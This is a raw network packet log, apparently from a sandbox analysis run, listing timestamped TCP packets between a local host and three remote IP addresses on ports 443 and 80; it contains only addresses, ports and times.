Oct 28, 2024 19:04:09.420411110 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.539813042 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.539834023 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.539999962 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.540009975 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.540060043 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.658839941 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.658879042 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.659032106 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.659032106 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.659043074 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.659092903 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.778881073 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.778904915 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.779154062 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.779164076 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.779236078 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.897680998 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.897706032 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.897777081 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.897784948 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.897835970 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.942035913 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.942064047 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.942105055 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.942112923 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.942152023 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.942171097 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.060987949 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.061019897 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.061110973 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.061120987 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.061166048 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.179927111 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.179965019 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.180022955 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.180031061 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.180080891 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.259838104 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.259865999 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.259983063 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.259993076 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.260047913 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.301222086 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.301253080 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.301493883 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.301506042 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.301564932 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.425520897 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.425558090 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.425601006 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.425609112 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.425662994 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.544115067 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.544152975 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.544208050 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.544215918 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.544255018 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.544270039 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.546067953 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.546094894 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.546175003 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.546183109 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.546231985 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.667367935 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.667396069 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.667484999 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.667496920 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.667547941 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.738065004 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.738092899 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.738169909 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.738181114 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.738220930 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.787645102 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.787667036 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.787787914 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.787801027 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.787858009 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.906682014 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.906703949 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.906846046 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.906862974 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.906914949 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.908401012 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.908421040 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.908490896 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:10.908500910 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:10.908549070 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.026125908 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.026150942 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.026350021 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.026361942 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.026417971 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.097619057 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.097651958 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.097712040 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.097722054 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.097770929 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.145673990 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.145694971 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.145746946 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.145755053 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.145807981 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.216964960 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.216988087 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.217031002 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.217039108 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.217073917 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.217097998 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.265446901 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.265472889 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.265516043 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.265522957 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.265554905 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.265578985 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.336484909 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.336505890 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.336719036 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.336730003 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.336930990 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.384613037 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.384633064 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.384744883 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.384753942 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.384803057 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.674160957 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674174070 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674220085 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674386978 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.674386978 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.674402952 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674462080 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.674462080 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674477100 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674503088 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674525976 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.674576044 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.674581051 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674628973 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.674665928 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674690008 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674746037 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.674752951 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.674804926 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.675225973 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.675246000 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.675292969 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.675299883 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.675338030 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.675362110 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.675601959 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.675621986 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.675668955 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.675676107 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.675709009 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.675729036 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.695163965 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.695184946 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.695252895 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.695260048 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.695327044 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.768944025 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.769002914 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.769282103 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.769290924 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.769376040 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.814063072 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.814117908 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.814161062 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.814167976 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.814237118 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.887712955 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.887736082 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.887918949 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.887928009 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.888130903 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.889146090 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.889167070 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.889226913 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.889234066 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.889281034 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.933870077 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.933892012 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.933990955 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:11.933999062 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:11.934045076 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.007637024 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.007662058 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.007755995 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.007764101 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.007833958 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.009151936 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.009177923 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.009315968 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.009322882 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.009413004 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.126240969 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.126277924 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.126395941 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.126405954 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.126458883 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.127152920 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.127180099 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.127254009 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.127260923 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.127310991 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.142483950 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.142508030 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.142689943 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.142697096 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.142744064 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.245737076 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.245758057 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.245995998 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.246006966 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.246082067 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.246829987 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.246850967 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.246921062 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.246927977 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.246980906 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.261473894 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.261501074 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.261698961 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.261708021 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.261801004 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.364695072 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.364733934 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.364799023 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.364806890 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.364878893 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.365884066 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.365902901 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.365973949 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.365981102 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.366029978 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.380681992 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.380702972 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.380742073 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.380748987 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.380806923 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.411226988 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.411250114 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.411304951 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:12.411310911 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:12.411359072 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:13.436652899 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.436669111 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.436721087 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.436738014 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:13.436753035 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.436779976 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:13.436800003 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:13.754746914 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.754761934 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.754806995 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.754853010 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:13.754863024 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.754913092 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:13.914150000 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.914181948 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.914258957 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:13.914273977 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:13.914314985 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.075499058 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.075524092 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.075715065 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.075723886 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.075773001 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.392632008 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.392642975 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.392697096 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.392729044 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.392739058 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.392772913 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.392846107 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.553064108 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.553088903 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.553175926 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.553184986 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.553217888 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.553229094 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.553821087 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.553841114 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.553905010 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.553913116 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.553956032 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.714459896 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.714481115 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.714531898 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.714539051 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.714561939 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.714585066 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.714637041 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.714683056 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.714690924 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.714715004 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:14.714757919 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:14.729830980 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:15.974745035 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:15.980274916 CET	80	49731	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:15.980360031 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:15.980616093 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:15.986371994 CET	80	49731	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:16.857008934 CET	80	49731	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:16.861835957 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:16.867527008 CET	80	49731	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:17.124233007 CET	80	49731	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:17.171948910 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:17.191184044 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:17.191236973 CET	443	49732	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:17.191293001 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:17.197472095 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:17.197494030 CET	443	49732	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:17.842879057 CET	443	49732	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:17.842962980 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:17.848300934 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:17.848335028 CET	443	49732	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:17.848596096 CET	443	49732	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:17.890702963 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:17.932676077 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:17.979373932 CET	443	49732	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:18.089354038 CET	443	49732	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:18.089415073 CET	443	49732	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:18.089658022 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:18.093771935 CET	49732	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:18.096709967 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:18.102086067 CET	80	49731	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:18.357861042 CET	80	49731	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:18.361646891 CET	49733	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:18.361696005 CET	443	49733	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:18.361814976 CET	49733	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:18.362143040 CET	49733	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:18.362159014 CET	443	49733	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:18.406338930 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:18.970412016 CET	443	49733	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:18.972501993 CET	49733	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:18.972526073 CET	443	49733	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:19.122919083 CET	443	49733	188.114.97.3	192.168.2.4
